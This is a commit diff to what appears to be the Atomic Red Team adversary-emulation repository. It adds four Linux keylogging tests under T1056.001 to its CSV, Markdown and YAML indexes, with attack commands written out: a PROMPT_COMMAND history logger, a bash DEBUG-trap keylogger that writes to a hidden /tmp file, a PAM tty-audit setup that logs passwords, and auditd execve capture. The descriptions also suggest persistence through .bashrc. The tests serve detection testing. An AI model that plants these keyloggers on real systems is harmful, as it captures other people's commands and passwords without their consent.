Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -32,6 +32,10 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497
 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
 credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
 credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
@@ -109,6 +113,10 @@ collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,
 collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -8,6 +8,10 @@ credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From L
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
@@ -26,6 +30,10 @@ collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single F
 collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
 collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
 collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash

atomics/Indexes/Indexes-Markdown/index.md

@@ -59,6 +59,10 @@
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #1: Input Capture [windows]
   - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+  - Atomic Test #3: Logging bash history to syslog [linux]
+  - Atomic Test #4: Bash session based keylogger [linux]
+  - Atomic Test #5: SSHD PAM keylogger [linux]
+  - Atomic Test #6: Auditd keylogger [linux]
 - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
   - Atomic Test #1: Dumping LSA Secrets [windows]
@@ -189,6 +193,10 @@
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #1: Input Capture [windows]
   - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+  - Atomic Test #3: Logging bash history to syslog [linux]
+  - Atomic Test #4: Bash session based keylogger [linux]
+  - Atomic Test #5: SSHD PAM keylogger [linux]
+  - Atomic Test #6: Auditd keylogger [linux]
 - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #1: Stage data from Discovery.bat [windows]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -23,6 +23,10 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+  - Atomic Test #3: Logging bash history to syslog [linux]
+  - Atomic Test #4: Bash session based keylogger [linux]
+  - Atomic Test #5: SSHD PAM keylogger [linux]
+  - Atomic Test #6: Auditd keylogger [linux]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -83,6 +87,10 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+  - Atomic Test #3: Logging bash history to syslog [linux]
+  - Atomic Test #4: Bash session based keylogger [linux]
+  - Atomic Test #5: SSHD PAM keylogger [linux]
+  - Atomic Test #6: Auditd keylogger [linux]
 - [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/index.yaml

@@ -2688,6 +2688,148 @@ credential-access:
           sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
         name: sh
         elevation_required: true
+    - name: Logging bash history to syslog
+      auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+      description: "There are several variables that can be set to control the appearance
+        of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
+        of these variables are executed as if they had been typed on the command line.
+        The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
+        and can be configured to write the latest \"bash history\" entries to the
+        syslog.\n\nTo gain persistence the command could be added to the users .bashrc
+        or .bash_aliases or the systems default .bashrc in /etc/skel/ \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires to be run in a bash shell and that logger
+          and tee are installed.
+
+'
+        prereq_command: |
+          if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+          if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+          if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+        get_prereq_command: 'echo ""
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+          echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+          tail /var/log/syslog
+        cleanup_command: 'unset PROMPT_COMMAND
+
+'
+    - name: Bash session based keylogger
+      auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
+      description: "When a command is executed in bash, the BASH_COMMAND variable
+        contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\".
+        The trap command is not a external command, but a built-in function of bash
+        and can be used in a script to run a bash function when some event occurs.
+        trap will detect when the BASH_COMMAND variable value changes and then pipe
+        that value into a file, creating a bash session based keylogger. \n\nTo gain
+        persistence the command could be added to the users .bashrc or .bash_aliases
+        or the systems default .bashrc in /etc/skel/ \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires to be run in a bash shell
+
+'
+        prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
+          Bash not running! *****\n"; exit 1; fi
+
+'
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        output_file:
+          name: output_file
+          description: File to store captured commands
+          type: String
+          default: "/tmp/.keyboard.log"
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: |
+          trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+          echo "Hello World!"
+          cat #{output_file}
+        cleanup_command: 'rm #{output_file}
+
+'
+    - name: SSHD PAM keylogger
+      auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+      description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
+        The Linux audit tool auditd can use the pam_tty_audit module to enable auditing
+        of TTY input and capture all keystrokes in a ssh session and place them in
+        the /var/log/audit/audit.log file after the session closes.
+
+'
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires sshd and auditd
+
+'
+        prereq_command: |
+          if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+          if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        user_account:
+          description: Basic ssh user account for testing.
+          type: string
+          default: ubuntu
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so
+          disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
+          restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
+        cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
+
+'
+    - name: Auditd keylogger
+      auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
+      description: "The linux audit tool auditd can be used to capture 32 and 64 bit
+        command execution and place the command in the /var/log/audit/audit.log audit
+        log. \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires sshd and auditd
+
+'
+        prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
+          auditd NOT installed *****\n"; exit 1; fi
+
+'
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        output_file:
+          description: description
+          type: type
+          default: default
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl
+          -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
+          $(date +\"%d/%m/%y %H:%M:%S\") \n"
+        cleanup_command: 'systemctl restart auditd
+
+'
   T1557.001:
     technique:
       external_references:
@@ -8325,6 +8467,148 @@ collection:
           sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
         name: sh
         elevation_required: true
+    - name: Logging bash history to syslog
+      auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+      description: "There are several variables that can be set to control the appearance
+        of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
+        of these variables are executed as if they had been typed on the command line.
+        The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
+        and can be configured to write the latest \"bash history\" entries to the
+        syslog.\n\nTo gain persistence the command could be added to the users .bashrc
+        or .bash_aliases or the systems default .bashrc in /etc/skel/ \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires to be run in a bash shell and that logger
+          and tee are installed.
+
+'
+        prereq_command: |
+          if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+          if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+          if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+        get_prereq_command: 'echo ""
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+          echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+          tail /var/log/syslog
+        cleanup_command: 'unset PROMPT_COMMAND
+
+'
+    - name: Bash session based keylogger
+      auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
+      description: "When a command is executed in bash, the BASH_COMMAND variable
+        contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\".
+        The trap command is not a external command, but a built-in function of bash
+        and can be used in a script to run a bash function when some event occurs.
+        trap will detect when the BASH_COMMAND variable value changes and then pipe
+        that value into a file, creating a bash session based keylogger. \n\nTo gain
+        persistence the command could be added to the users .bashrc or .bash_aliases
+        or the systems default .bashrc in /etc/skel/ \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires to be run in a bash shell
+
+'
+        prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
+          Bash not running! *****\n"; exit 1; fi
+
+'
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        output_file:
+          name: output_file
+          description: File to store captured commands
+          type: String
+          default: "/tmp/.keyboard.log"
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: |
+          trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+          echo "Hello World!"
+          cat #{output_file}
+        cleanup_command: 'rm #{output_file}
+
+'
+    - name: SSHD PAM keylogger
+      auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+      description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
+        The Linux audit tool auditd can use the pam_tty_audit module to enable auditing
+        of TTY input and capture all keystrokes in a ssh session and place them in
+        the /var/log/audit/audit.log file after the session closes.
+
+'
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires sshd and auditd
+
+'
+        prereq_command: |
+          if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+          if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        user_account:
+          description: Basic ssh user account for testing.
+          type: string
+          default: ubuntu
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so
+          disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
+          restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
+        cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
+
+'
+    - name: Auditd keylogger
+      auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
+      description: "The linux audit tool auditd can be used to capture 32 and 64 bit
+        command execution and place the command in the /var/log/audit/audit.log audit
+        log. \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires sshd and auditd
+
+'
+        prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
+          auditd NOT installed *****\n"; exit 1; fi
+
+'
+        get_prereq_command: 'echo ""
+
+'
+      input_arguments:
+        output_file:
+          description: description
+          type: type
+          default: default
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl
+          -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
+          $(date +\"%d/%m/%y %H:%M:%S\") \n"
+        cleanup_command: 'systemctl restart auditd
+
+'
   T1557.001:
     technique:
       external_references:

atomics/T1056.001/T1056.001.md

@@ -16,6 +16,14 @@ Keylogging is the most prevalent type of input capture, with many different ways
 
 - [Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d](#atomic-test-2---living-off-the-land-terminal-input-capture-on-linux-with-pamd)
 
+- [Atomic Test #3 - Logging bash history to syslog](#atomic-test-3---logging-bash-history-to-syslog)
+
+- [Atomic Test #4 - Bash session based keylogger](#atomic-test-4---bash-session-based-keylogger)
+
+- [Atomic Test #5 - SSHD PAM keylogger](#atomic-test-5---sshd-pam-keylogger)
+
+- [Atomic Test #6 - Auditd keylogger](#atomic-test-6---auditd-keylogger)
+
 
 <br/>
 
@@ -107,4 +115,217 @@ echo "Sorry, you must install module pam_tty_audit.so and recompile, for this te
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Logging bash history to syslog
+There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.
+
+To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+tail /var/log/syslog
+```
+
+#### Cleanup Commands:
+```sh
+unset PROMPT_COMMAND
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: This test requires to be run in a bash shell and that logger and tee are installed.
+##### Check Prereq Commands:
+```sh
+if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Bash session based keylogger
+When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. 
+
+To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | File to store captured commands | String | /tmp/.keyboard.log|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+echo "Hello World!"
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```cmd
+rm #{output_file}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: This test requires to be run in a bash shell
+##### Check Prereq Commands:
+```sh
+if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - SSHD PAM keylogger
+Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| user_account | Basic ssh user account for testing. | string | ubuntu|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+cp -v /etc/pam.d/sshd /tmp/
+echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd"
+systemctl restart sshd
+systemctl restart auditd
+ssh #{user_account}@localhost 
+whoami
+sudo su
+whoami
+exit
+exit
+```
+
+#### Cleanup Commands:
+```cmd
+cp -fv /tmp/sshd /etc/pam.d/
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: This test requires sshd and auditd
+##### Check Prereq Commands:
+```sh
+if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Auditd keylogger
+The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a668edb9-334e-48eb-8c2e-5413a40867af
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | description | type | default|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
+auditctl -a always,exit -F arch=b32 -S execve -k CMDS
+whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")
+```
+
+#### Cleanup Commands:
+```cmd
+systemctl restart auditd
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: This test requires sshd and auditd
+##### Check Prereq Commands:
+```sh
+if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
 <br/>